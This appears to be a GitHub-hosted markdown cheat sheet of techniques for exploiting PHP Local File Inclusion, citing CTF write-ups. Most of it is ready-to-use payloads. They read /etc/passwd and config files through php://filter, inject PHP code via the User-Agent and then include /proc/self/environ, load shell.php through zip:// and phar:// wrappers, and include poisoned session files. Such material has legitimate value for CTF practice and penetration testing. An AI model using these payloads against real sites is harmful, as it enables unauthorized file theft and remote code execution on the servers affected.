Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

67 lines (50 sloc) 2.23 KB

Tricky ways to exploit PHP Local File Inclusion

Introduction

Brought from Wikipedia, Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution.

For instance:

include $_GET['file'];

or harder one,

include $_GET['file'] . ".php";

Tricks

Direct Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=/etc/passwd
    • index.php?file=php://filter/convert.base64-encode/resource=config.php
  • Remote code exection:

    • /proc/self/environ

      GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
      Host: www.site.com
      User-Agent: <?php echo assert($_GET['cmd']);?>
      
    • Zip and Phar wrappers

      • index.php?file=zip://image.zip#shell.php
      • index.php?file=phar://image.phar/shell.php
    • Session Files

      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123php
        

Indirect Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=php://filter/convert.base64-encode/resource=config # will append ".php" at the end
  • Remote code exection:

    • Zip and Phar wrappers
      • index.php?file=zip://image.zip#shell
      • index.php?file=phar://image.phar/shell
    • Session Files
      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123
        

Reference

  1. File inclusion vulnerability
  2. 通过 zip/phar 协议包含文件
  3. AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
  4. lucyoa/ctf-wiki
You can’t perform that action at this time.